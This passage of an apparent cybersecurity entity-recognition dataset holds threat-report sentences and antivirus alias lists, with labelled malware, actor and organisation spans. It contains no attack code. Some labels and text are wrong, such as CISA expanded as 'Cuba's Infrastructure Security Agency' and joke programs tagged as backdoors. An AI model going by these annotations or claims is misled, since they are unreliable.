W32/Trojan.RQNC-0214 TR/Win32.HDDKill Virus/Win32.Plutor Backdoor:Win32/Plutor.B Virus.Win32.Plutor.b Virus.Win32.Plutor.b W32/Plutor.B Win32/Plutor.B Win32.Virus.Plutor.Htby Worm.Plutor!yPZ/v8ChneU W32/Plutor.B Win32/Trojan.3db", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003937", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.eHeur.Virus02 Trojan.Gamarue.29491 HT_GAMARUE_GI0705DA.UVPM Win32.Trojan.WisdomEyes.16070401.9500.9995 W32/Trojan3.FQX W32.Shadesrat HT_GAMARUE_GI0705DA.UVPM Trojan.Win32.Inject.bxpwvz W32.W.Palevo.lJR8 Trojan.DownLoader5.4594 Backdoor.DarkKomet.Win32.11962 W32/Trojan.FEOJ-4670 TR/Drop.Gamarue.J TrojanDropper:Win32/Gamarue.I Trojan.Symmi.D5EBC Backdoor/Win32.DarkKomet.R72424 SScope.Malware-Cryptor.Winlock.1513 Trojan.Injector!eYQevBEYEJs Trojan-PWS.Win32.Zbot", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003939", "source": "cyner2_train"}} {"text": "The attackers sent multiple emails containing macro-enabled XLS files to employees working in the banking sector in the Middle East.", "spans": {"THREAT_ACTOR: attackers": [[4, 13]], "ORGANIZATION: employees": [[73, 82]], "ORGANIZATION: the banking sector": [[94, 112]]}, "info": {"id": "cyner2_train_003943", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/W32.Opus.175136 Trojan.Win32.Opus!O Trojan.Opus.Win32.6 Trojan/Opus.gd Win32.Trojan.WisdomEyes.16070401.9500.9999 Win.Trojan.Opus-1 Trojan-Dropper.Win32.Dinwod.aeuh Trojan.Win32.Opus.iiuoo W32.W.AutoRun.l6Zu BehavesLike.Win32.Ransomware.ch Trojan.Win32.Opus Trojan/Opus.e Trojan/Win32.Opus Trojan.Zusy.D53A5 Trojan-Dropper.Win32.Dinwod.aeuh Trojan.Opus Win32/Swimnag.B Trojan.Opus!SLndS2cINJM", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003944", "source": "cyner2_train"}} {"text": "A backdoor also known as: not-a-virus:AdWare.Win32.BHO.bgvh Riskware.Win32.BHO.ewirij Adware.Spigot.139 ADWARE/BrowserIO.nylnh 
GrayWare[AdWare]/Win32.BHO Trojan.Razy.D36397 not-a-virus:AdWare.Win32.BHO.bgvh PUP.Optional.SearchBar", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003946", "source": "cyner2_train"}} {"text": "It has been operating since November 2016 at least.", "spans": {}, "info": {"id": "cyner2_train_003949", "source": "cyner2_train"}} {"text": "A backdoor also known as: TrojanDownloader.Tandfuy Trojan.Symmi.DA610 BehavesLike.Win32.Dropper.lt Trojan-Downloader.Win32.Tandfuy W32/Trojan.ZKSQ-8249 TR/Bipamid.dnrhz TrojanDownloader:Win32/Tandfuy.B Trojan/Win32.AVKill.R107811 Trj/GdSda.A Win32/Bipamid.C", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003950", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Cuegoe.18812 Trojan.Dropper Win.Trojan.Cuegoe-6336261-0 Application.Win32.Amonetize.NE BehavesLike.Win32.BrowseFox.gc Trojan/Win32.Unknown Trojan.Zusy.D41B27 Trojan/Win32.Cuegoe.R208534 TrojanDropper.Cuegoe Win32/Trojan.85a", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003951", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.VB.1 Trojan/W32.Cospet.81730 Trojan.Win32.Cospet!O TrojanPWS.VB.CX Trojan.Cospet.Win32.97 Backdoor.VB.1 Win32.Trojan.WisdomEyes.16070401.9500.9999 Win32/Spy.VB.NFL Backdoor.VB.1 Trojan.Win32.Cospet.ha Backdoor.VB.1 Trojan.Win32.Cospet.bjyzt Trojan.Win32.A.Cospet.81728[UPX] Troj.PSW32.W.QQPass.l9CX Backdoor.VB.1 TrojWare.Win32.Spy.VB.NFL0 Backdoor.VB.1 Win32.HLLW.Autoruner.46782 BehavesLike.Win32.Trojan.lc Trojan/Cospet.gz Trojan.Win32.Cospet Trojan/Cospet.av Trojan/Win32.Cospet Trojan/Win32.Cospet.R2764 Trojan.Win32.Cospet.ha Backdoor.VB.1 Trojan.Cospet!9xWgZWamXaI RAT.LostDoor W32/Cospet.HA!tr Win32/Backdoor.4a9", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003952", "source": "cyner2_train"}} {"text": "It uses a flash exploit that targets the recent vulnerability in Adobe flash.", "spans": 
{"VULNERABILITY: flash exploit": [[10, 23]], "VULNERABILITY: vulnerability": [[48, 61]], "SYSTEM: Adobe flash.": [[65, 77]]}, "info": {"id": "cyner2_train_003953", "source": "cyner2_train"}} {"text": "A backdoor also known as: Rootkit.TDss.F Win32.Trojan.WisdomEyes.16070401.9500.9996 Rootkit.TDss.F Packed.Win32.Krap.e Rootkit.TDss.F Rootkit.TDss.F Rootkit.TDss.F Win32.Troj.Krap.c.35328 Rootkit.TDss.F Packed.Win32.Krap.e Trojan/Win32.Alureon.R61580 Rootkit.TDss.F W32/PackTdss.Y!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003957", "source": "cyner2_train"}} {"text": "Cybercriminals are cashing in on advertising and installing legitimate applications.", "spans": {"THREAT_ACTOR: Cybercriminals": [[0, 14]]}, "info": {"id": "cyner2_train_003959", "source": "cyner2_train"}} {"text": "We analyze multiple versions of KeyBoy revealing a development cycle focused on avoiding basic antivirus detection.", "spans": {"MALWARE: KeyBoy": [[32, 38]], "SYSTEM: antivirus detection.": [[95, 115]]}, "info": {"id": "cyner2_train_003960", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Tinba.WR4 Trojan/Tinba.be Win32.Trojan.WisdomEyes.16070401.9500.9998 Trojan.Win32.Tinba.dqteol TrojWare.Win32.Roitamit.BE Trojan.PWS.Tinba.153 Trojan.Tinba.Win32.1916 TR/Crypt.ZPACK.137753 Trojan/Win32.Skeeyah.R216296 Trojan.Tinba Win32/Tinba.BE Trojan.Tinba!GN4G+jbMfD0 Trojan.Win32.Tinba W32/Tinba.BE!tr Win32/Trojan.6ed", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003961", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Razy.D167A7 Win32.Trojan.WisdomEyes.16070401.9500.9977 TrojWare.Win32.TrojanDownloader.Small.SGE Trojan.Yakes.uzd Trojan/Win32.Yakes.C2360515 Trojan.Yakes Win32.Trojan.Yakes.Pgcz Win32/Trojan.483", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003962", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.OnGamesGNOLAH.Trojan Worm.Win32.VB!O 
Trojan.Jinra.A3 Worm.VB.Win32.2511 W32/VB.bem Win32.Worm.VB.kz W32.SillyFDC Win32/SillyAutorun.CKX WORM_VB.JSE Worm.Win32.VB.bem Trojan.Win32.VB.csfhed W32.W.VB.tnRc Win32.Worm.Vb.Szvd WORM_VB.JSE Worm/VB.pbz Worm/Win32.VB Worm:Win32/Jinra.A Trojan.Symmi.D5113 Worm.Win32.A.VB.184320 Worm.Win32.VB.bem Worm/Win32.VB.R125768 Trojan.VBRA.010736 Worm.Email Win32/VB.NUR Worm.VB!cXQoycDN5vU Worm.Win32.AutoRun", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003964", "source": "cyner2_train"}} {"text": "If the Trojan cannot find this file, it attempts to register itself in autorun.", "spans": {"MALWARE: Trojan": [[7, 13]]}, "info": {"id": "cyner2_train_003965", "source": "cyner2_train"}} {"text": "Called HummingBad, this malware establishes a persistent rootkit with the objective to generate fraudulent ad revenue for its perpetrator, similar to the Brain Test app discovered by Check Point earlier this year.", "spans": {"MALWARE: HummingBad,": [[7, 18]], "MALWARE: malware": [[24, 31]], "MALWARE: rootkit": [[57, 64]], "ORGANIZATION: perpetrator,": [[126, 138]], "SYSTEM: Brain Test app": [[154, 168]], "ORGANIZATION: Check Point": [[183, 194]]}, "info": {"id": "cyner2_train_003967", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9564 Trojan.Razy.D37E6E TrojanDownloader:Win32/Aentdwn.B!bit", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003968", "source": "cyner2_train"}} {"text": "On Aug.23, 2016, FireEye detected a potentially new ATM malware sample that used some interesting techniques not seen before.", "spans": {"ORGANIZATION: FireEye": [[17, 24]], "MALWARE: ATM malware": [[52, 63]]}, "info": {"id": "cyner2_train_003969", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Downloader.JKVR Trojan.Win32.Scar!O Win32.Trojan.WisdomEyes.16070401.9500.9999 Win.Trojan.Downloader-56615 Trojan.Downloader.JKVR Trojan.Downloader.JKVR Trojan.Downloader.JKVR 
Trojan.Downloader.JKVR Trojan.Click2.2601 Trojan.Scar.Win32.55928 BehavesLike.Win32.Backdoor.kh Trojan.Win32.Scar TR/Dldr.Pingbed.A.33 TrojanDownloader:Win32/Pingbed.A Trojan.Scar Trojan.Downloader.JKVR W32/Nutiliers.AA!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003971", "source": "cyner2_train"}} {"text": "The FBI and Cuba's Infrastructure Security Agency CISA have issued a joint cybersecurity advisory, warning about the threat posed by Cuba's cyber actors and the #StopRansomware.", "spans": {"ORGANIZATION: The FBI": [[0, 7]], "ORGANIZATION: Cuba's Infrastructure Security Agency CISA": [[12, 54]], "MALWARE: threat": [[117, 123]], "THREAT_ACTOR: Cuba's cyber actors": [[133, 152]], "THREAT_ACTOR: the #StopRansomware.": [[157, 177]]}, "info": {"id": "cyner2_train_003974", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Multi Win32/Jorik.KJ Trojan.Win32.Lofumin.exefpy Trojan.MulDrop7.58418 BehavesLike.Win32.Dropper.tc PUA.CoinMiner TR/AD.Lofumin.zzzlc Trojan:Win32/Lofumin.A Trojan.MulDrop Trj/CI.A BAT/CoinMiner.YC BAT/CoinMiner.YC!tr Win32/Trojan.9b2", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003977", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.Sality.PE Win32.Sality.OG Win32.Sality.OG Trojan.Win32.Krap.1!O W32.Sality.R W32/Autorun.worm.zzh Trojan.Win32.AutoRun.wazcf W32.SillyFDC AutoRun.BI Win32/Sality.AA WORM_AUTORUN.SMZ Worm.Autorun-1783 Win32.Sality.OG Win32.Sality.L Virus.Win32.TuTu.A.200000 Win32.Sality.OG Win32.Sality.OG Win32.HLLW.Autoruner.6138 Virus.Sality.Win32.15 WORM_AUTORUN.SMZ BehavesLike.Win32.Sality.fm W32/Sality.AA Win32.Sality.ab.173464 Worm:Win32/Hikjav.A Win32/Kashu.B Win32.Sality.OG Virus.Win32.Sality.baka Virus.Win32.Heur W32/AutoRun.FT!tr Win32/Sality.AJ", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003979", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.VotwupD.fam.Trojan 
Trojan.Downloader.JNGS Trojan.Win32.Krap.3!O Trojan.Bredolab.AA Trojan.LdPinch.Win32.14316 Trojan/PSW.LdPinch.apfl TROJ_BURNIX.SMEP Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/Trojan2.NKYP Trojan.Bubnix TROJ_BURNIX.SMEP Win.Trojan.Downloader-36570 Trojan.Downloader.JNGS Packed.Win32.Krap.ao Trojan.Downloader.JNGS Trojan.Win32.Krap.dccehe Troj.PSW32.W.LdPinch.apfl!c TrojWare.Win32.PkdKrap.AO Trojan.Downloader.JNGS Trojan.DownLoader1.19419 W32/Trojan.DTIT-2576 Trojan/PSW.LdPinch.wcs W32.Trojan.Trojan-Downloader.Ge Trojan[Packed]/Win32.Krap Trojan.Downloader.JNGS Packed.Win32.Krap.ao TrojanDownloader:Win32/Bubnix.A Win-Trojan/Bredolab.55808 Trojan-Downloader.Ver54 Trojan.Downloader.JNGS Trojan.Downloader.JNGS Trojan.Downloader Win32.Packed.Krap.Efao Trojan.DL.JNGS!S940SQYc1R4 W32/Krap.AON!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003980", "source": "cyner2_train"}} {"text": "A backdoor also known as: Joke/W32.BadJoke.63153 JOKE_BADGAME.A Joke.Badgame JOKE_BADGAME.A Win.Worm.BadGameA-1 Hoax.Win32.BadJoke.Badgame Riskware.Win32.Badgame.hxed Joke.Win32.FakeFormat.63153 Joke.Win32.BadGame Joke.BadGame W32/Joke.XWVG-6884 HackTool[Hoax]/Win32.Badgame Win32.Joke.Badgame.kcloud Hoax.W32.BadJoke.Badgame!c Hoax.Win32.BadJoke.Badgame Win-Joke/FFormat.63488 Win32.Trojan-psw.Badjoke.Apdb Joke.Badgame.A not-a-virus:BadJoke.Win32.Badgame", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003981", "source": "cyner2_train"}} {"text": "When we found the exploit it appeared to be under development and evidence suggests it was deployed in Georgia.", "spans": {"VULNERABILITY: exploit": [[18, 25]]}, "info": {"id": "cyner2_train_003982", "source": "cyner2_train"}} {"text": "Dridex utilizes an improved version of GoZ's peer-to-peer architecture to protect its command-and-control C2 servers against detection by security researchers and law enforcement.", "spans": {"MALWARE: Dridex": [[0, 6]], "MALWARE: GoZ's": [[39, 44]], "SYSTEM: 
peer-to-peer architecture": [[45, 70]], "ORGANIZATION: security researchers": [[138, 158]], "ORGANIZATION: law enforcement.": [[163, 179]]}, "info": {"id": "cyner2_train_003983", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.VariantBarysR.Trojan Troj.Zeleffo.Sma!c TROJ_ZELEFFO.SMA Trojan.Win32.Nitol.115301 Trojan.Zeleffo.Win32.2 TROJ_ZELEFFO.SMA Trojan.Win32.Nitol Trojan:Win32/Nitol.C SScope.Trojan-Downloader.16517", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003984", "source": "cyner2_train"}} {"text": "Latest Trickbot's module called shareDll32 used for malware spreading in network shares.", "spans": {"MALWARE: Trickbot's": [[7, 17]], "MALWARE: shareDll32": [[32, 42]], "MALWARE: malware": [[52, 59]], "SYSTEM: network shares.": [[73, 88]]}, "info": {"id": "cyner2_train_003985", "source": "cyner2_train"}} {"text": "A backdoor also known as: PUA.Packed.ASPack Trojan/Win32.HDC", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003988", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.DoS.Doraah.A Trojan/W32.DoS.959488 Trojan.DoS.Doraah.A DoS.Doraah!A/vo/IPDx2c W32/Rado.A@bd Backdoor.Trojan Smalldoor.BASU DoS.Win32.Doraah Trojan.Win32.Doraah.dgjf Trojan.DoS.Doraah.A DoS.Win32.Doraah Trojan.DoS.Doraah.A BackDoor.IRC.Dostan Tool.Doraah.Win32.4 W32/Rado.SFME-6858 DDoS.Doraah DDOS/Doraah.A.1 HackTool[DoS]/Win32.Doraah Win32.Hack.Doraah.kcloud Win-Trojan/Doraah.959488 Trojan.DoS.Doraah.A Trojan.DoS.Doraah.A DoS.Doraah Win32/DoS.Doraah.A Win32.Trojan.Doraah.Egyh W32/Murscat.A!tr DoS.HX Trojan.Win32.Doraah.aa", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003989", "source": "cyner2_train"}} {"text": "The Tick group has conducted cyber espionage attacks against organizations in the Republic of Korea and Japan for several years.", "spans": {"THREAT_ACTOR: The Tick group": [[0, 14]], "THREAT_ACTOR: cyber espionage": [[29, 44]], "ORGANIZATION: organizations": 
[[61, 74]]}, "info": {"id": "cyner2_train_003990", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-PWS/W32.WebGame.16032.D Trojan-PSW.Win32.Mapler!O PWS.OnLineGames.MY65 PWS-OnlineGames.lf Trojan/PSW.Mapler.vm Win32.Trojan-PSW.OLGames.bx HV_ONLINEGAMES_CI194C7D.RDXN Trojan.Win32.Mapler.tpzmc Trojan.Win32.PSWIGames.16032.G Trojan.NtRootKit.13695 Trojan.Mapler.Win32.112 PWS-OnlineGames.lf Trojan-PWS.OnlineGames Trojan/PSW.Mapler.fj Trojan[PSW]/Win32.Mapler PWS:WinNT/OnLineGames.E TrojanPSW.Mapler Win32/PSW.OnLineGames.QDG Trojan.PWS.Mapler!9tj8NfYyp+s", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003992", "source": "cyner2_train"}} {"text": "After encrypting popular file types with the AES-256 encryption algorithm, TeslaCrypt holds the files for a ransom of $250 to $1000.", "spans": {"MALWARE: TeslaCrypt": [[75, 85]]}, "info": {"id": "cyner2_train_003994", "source": "cyner2_train"}} {"text": "A backdoor also known as: Ransom.Autoit.Stampado.A Trojan.Blocker.Win32.37081 Ransom_Stampado.R055C0DAS18 Trojan.Encoder.10337 Ransom_Stampado.R055C0DAS18 BehavesLike.Win32.Ransom.fc W32/Trojan.ULQL-2410 Ransom:Win32/Stampado.A Trojan/Win32.Blocker.C1763564 Worm.Win32.Filecoder", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003995", "source": "cyner2_train"}} {"text": "A backdoor also known as: Exploit.CVE-2016-0034 Trojan.Crypt.RV Exploit.CVE.Win32.1627 Trojan/Exploit.CVE-2016-0034.p Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Packed2.37654 W32/CVE160034.OKEY-4732 Exploit.CVE-2016-0034.d EXP/Silverlight.AN Trojan[Exploit]/Win32.CVE-2016-0034 Trojan/Win32.MSIL.C1374172 Exploit.CVE20160034 Trj/GdSda.A Win32/Exploit.CVE-2016-0034.P Exploit.CVE-2016-0034!", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003996", "source": "cyner2_train"}} {"text": "The first copying of the exploit code we spotted was from the Sundown exploit kit EK, followed closely by Magnitude and a 
resurgent KaiXin EK.", "spans": {"MALWARE: Sundown exploit kit EK,": [[62, 85]], "MALWARE: Magnitude": [[106, 115]], "MALWARE: resurgent KaiXin EK.": [[122, 142]]}, "info": {"id": "cyner2_train_004000", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Graybird Win.Trojan.HackersDoor-6351576-1 Backdoor:Win64/Hackdoor.A!dll Backdoor/Win32.Hackdoor.R28108 Trj/CI.A Win32/Backdoor.14f", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004001", "source": "cyner2_train"}} {"text": "Note that the affected sites have consistent followers given the nature of their content.", "spans": {}, "info": {"id": "cyner2_train_004003", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.NTPacker Trojan.NTPacker Trojan.NTPacker Win32.Trojan.WisdomEyes.16070401.9500.9936 Bloodhound.NTPacker Win.Trojan.Hydraq-9 Packed.Win32.PolyCrypt.b Trojan.NTPacker Trojan.NTPacker TrojWare.Win32.TrojanDropper.ErPack Trojan.NTPacker BackDoor.Ser.4 Trojan/PSW.QQPass.fk TrojanDropper:Win32/MultiDropper.B Packed.Win32.PolyCrypt.b Trojan.NTPacker Trojan/Win32.Delf.R33596 TScope.Malware-Cryptor.SB Win32.Packed.Polycrypt.Lndy W32/PolyCrypt.B!tr Win32/Trojan.267", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004005", "source": "cyner2_train"}} {"text": "IOCs for today Jaff ransomware run", "spans": {"MALWARE: Jaff ransomware": [[15, 30]]}, "info": {"id": "cyner2_train_004007", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Mjaka.A4 TROJ_MJAKA.C Win32.Trojan.WisdomEyes.16070401.9500.9762 TROJ_MJAKA.C Trojan.Win32.FC.euumqd W32/Trojan.EEMC-0397 Trojan:MSIL/Mjaka.A Spyware.InfoStealer Trj/Mjaka.A Win32/Trojan.9a1", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004008", "source": "cyner2_train"}} {"text": "A backdoor also known as: JS.Exploit.ShellCode.c Backdoor.Chches PowerShell/Kryptik.A BKDR_ChChes.SMZJEA-A BKDR_ChChes.SMZJEA-A Trojan.UPLT-5 Trojan:Win32/Posploi.A 
JS.S.Exploit.121732 Trojan.Win32.Chches Win32/Trojan.76d", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004013", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-Spy/W32.Banker.902656.L Trojan.Win32.Malware.1 Win32/PSW.Delf.NUI Banker.FEDD Trojan-Banker.Win32.Banker.aqtj Win32.HLLM.Sowsat.92 Win32/SillyDl.PVN Backdoor.Win32.Rbot!IK Trojan-Banker.Win32.Banker.aqtj Backdoor.Win32.Rbot PSW.Delf.EFZ Trj/Banker.FWD", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004014", "source": "cyner2_train"}} {"text": "The attack exploited an Adobe Flash vulnerability that stems from the zero-day vulnerabilities exposed from this month's Hacking Team data breach.", "spans": {"VULNERABILITY: Adobe Flash vulnerability": [[24, 49]], "VULNERABILITY: zero-day vulnerabilities": [[70, 94]], "ORGANIZATION: Hacking Team": [[121, 133]]}, "info": {"id": "cyner2_train_004018", "source": "cyner2_train"}} {"text": "In addition, our data showed that there had been a high volume of spam runs during the weekdays and then a decreased volume during the weekends.", "spans": {}, "info": {"id": "cyner2_train_004019", "source": "cyner2_train"}} {"text": "A backdoor also known as: W97M.Downloader.CZH O97M.Downloader.DI W97M.Downloader.CZH W97M.Downloader.CZH W97M.Downloader.CZH W97M.Downloader.CZH HEUR_VBA.CN TrojanDownloader:W97M/Ursnif.A W97M.Downloader.CZH W97M.Downloader.CZH virus.office.qexvmc.1100", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004020", "source": "cyner2_train"}} {"text": "This list is expected to expand : Package name Application name com.android.vending Play Market com.boursorama.android.clients Boursorama Banque com.caisseepargne.android.mobilebanking Banque com.chase.sig.android Chase Mobile com.clairmail.fth Fifth Third Mobile Banking com.connectivityapps.hotmail Connect for Hotmail com.google.android.gm Gmail com.imo.android.imoim imo free video calls and chat com.infonow.bofa 
Bank of America Mobile Banking com.IngDirectAndroid ING com.instagram.android Instagram com.konylabs.capitalone Capital One® Mobile com.mail.mobile.android.mail mail.com mail com.microsoft.office.outlook Microsoft Outlook com.snapchat.android Snapchat com.tencent.mm WeChat com.twitter.android Twitter com.ubercab Uber com.usaa.mobile.android.usaa USAA Mobile com.usbank.mobilebanking U.S. Bank - Inspired by customers com.viber.voip Viber com.wf.wellsfargomobile Wells Fargo Mobile com.whatsapp WhatsApp com.yahoo.mobile.client.android.mail Yahoo Mail – Organized Email fr.banquepopulaire.cyberplus Banque Populaire fr.creditagricole.androidapp Ma Banque jp.co.rakuten_bank.rakutenbank 楽天銀行 -個人のお客様向けアプリ mobi.societegenerale.mobile.lappli L ’ Appli Société Générale net.bnpparibas.mescomptes Mes Comptes BNP Paribas org.telegram.messenger Telegram Triout - Spyware Framework for Android with Extensive Surveillance Capabilities August 20 , 2018 No operating system is safe from malware , as cyber criminals will always want to steal , spy or tamper with your data .", "spans": {"SYSTEM: Play Market": [[84, 95]], "SYSTEM: Banque": [[138, 144], [185, 191], [1018, 1024]], "SYSTEM: Chase Mobile": [[214, 226]], "SYSTEM: Fifth Third Mobile Banking": [[245, 271]], "SYSTEM: Connect for Hotmail": [[301, 320]], "SYSTEM: Gmail": [[343, 348]], "SYSTEM: imo": [[371, 374]], "SYSTEM: Bank of America Mobile Banking": [[418, 448]], "SYSTEM: Capital One® Mobile": [[530, 549]], "SYSTEM: mail": [[588, 592]], "SYSTEM: Microsoft Outlook": [[622, 639]], "SYSTEM: Snapchat": [[661, 669]], "SYSTEM: WeChat": [[685, 691]], "SYSTEM: Twitter": [[712, 719]], "ORGANIZATION: Uber": [[732, 736]], "SYSTEM: USAA Mobile": [[766, 777]], "SYSTEM: Viber": [[852, 857]], "SYSTEM: Wells Fargo Mobile": [[882, 900]], "SYSTEM: WhatsApp": [[914, 922]], "SYSTEM: Yahoo Mail": [[960, 970]], "SYSTEM: Ma Banque": [[1064, 1073]], "MALWARE: Triout": [[1267, 1273]], "SYSTEM: Android": [[1298, 1305]]}, "info": {"id": 
"cyner2_train_004021", "source": "cyner2_train"}} {"text": "Developed by ksoft, Uploader! allows its user to upload files to the internet via FTP.", "spans": {"ORGANIZATION: ksoft,": [[13, 19]], "SYSTEM: Uploader!": [[20, 29]]}, "info": {"id": "cyner2_train_004022", "source": "cyner2_train"}} {"text": "The modus operandi for all three investigations were very similar and appear to be a new Carbanak gang attack methodology, focused on the hospitality industry.", "spans": {"THREAT_ACTOR: Carbanak gang": [[89, 102]], "ORGANIZATION: hospitality industry.": [[138, 159]]}, "info": {"id": "cyner2_train_004025", "source": "cyner2_train"}} {"text": "A backdoor also known as: TrojWare.Win32.TrojanDownloader.Tibs.1 Riskware.PSWTool.Win32.IEPassView.m!IK not-a-virus:PSWTool.Win32.IEPassView.m", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004026", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Injector.Win32.400028 Trojan.Johnnie.D3FAD Trojan.Win32.Kovter.rky Trojan.Win32.Kovter.efkdwr Troj.Dropper.W32.Nail.ldEa Trojan.Kovter.297 PUA.Win32.Dlhelper Trojan.Kovter.axf Trojan:Win32/Kometage.A Trojan.Win32.Kovter.rky Trojan/Win32.Kovter.R186277 Trojan.Kovter Trojan.Kovter!DsLwWELZUiM W32/Injector.DDXC!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004027", "source": "cyner2_train"}} {"text": "So far, no AV has given any meaningful identification to this malware—it is detected under generic names.", "spans": {"SYSTEM: AV": [[11, 13]], "MALWARE: malware—it": [[62, 72]]}, "info": {"id": "cyner2_train_004029", "source": "cyner2_train"}} {"text": "In early February 2015, Dell SecureWorks Counter Threat UnitTM CTU researchers investigated a new file-encrypting ransomware family named TeslaCrypt, which was distributed by the popular Angler browser exploit kit.", "spans": {"ORGANIZATION: Dell SecureWorks Counter Threat UnitTM CTU researchers": [[24, 78]], "MALWARE: file-encrypting ransomware family": [[98, 
131]], "MALWARE: TeslaCrypt,": [[138, 149]], "MALWARE: Angler browser exploit kit.": [[187, 214]]}, "info": {"id": "cyner2_train_004030", "source": "cyner2_train"}} {"text": "We believe that the main goal of attackers using these tools is cybersabotage.", "spans": {"THREAT_ACTOR: attackers": [[33, 42]], "MALWARE: tools": [[55, 60]], "THREAT_ACTOR: cybersabotage.": [[64, 78]]}, "info": {"id": "cyner2_train_004033", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9955 Win.Trojan.Alina-5 Trojan.Win32.Alinaos.ewvxne BehavesLike.Win32.Dropper.qc Trojan.Win32.Alinaos W32/Trojan.ZTVS-0655 TrojanSpy:Win32/Alinaos.G Trojan.Win32.Z.Alinaos.57344 Win32.Worm.Alinaos.C Trj/GdSda.A Win32/Trojan.3de", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004034", "source": "cyner2_train"}} {"text": "We have been presented with a rare opportunity to see some development activities from the actors associated with the OilRig attack campaign, a campaign Unit 42 has been following since May 2016.", "spans": {"THREAT_ACTOR: the OilRig attack campaign,": [[114, 141]], "THREAT_ACTOR: campaign": [[144, 152]], "ORGANIZATION: Unit 42": [[153, 160]]}, "info": {"id": "cyner2_train_004035", "source": "cyner2_train"}} {"text": "A backdoor also known as: TrojanAPT.DarkHotel.A5 Trojan/Inexsmar.b Win32.Trojan.WisdomEyes.16070401.9500.9940 W32/Trojan.WHDF-1534 Trojan.Munidub TROJ_ASRUEX.B Trojan.Win32.Zapchast.ahgo Trojan.Win32.Zapchast.eavzfr Troj.W32.Zapchast!c TrojWare.Win32.UMal.chn Trojan.Inexsmar.Win32.1 TROJ_ASRUEX.B BehavesLike.Win32.Downloader.th Trojan.Zapchast.x Trojan/Win32.Zapchast Trojan.Zusy.D2AD58 Trojan.Win32.Zapchast.ahgo Trojan/Win32.Asruex.R175438 Trojan.Zapchast.pk Trojan.Zapchast Trj/GdSda.A Win32/Inexsmar.B Trojan.Zapchast!JP2wAgi6V+c Trojan.Win32.Inexsmar Win32/Trojan.2cb", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004037", "source": "cyner2_train"}} {"text": "A backdoor also 
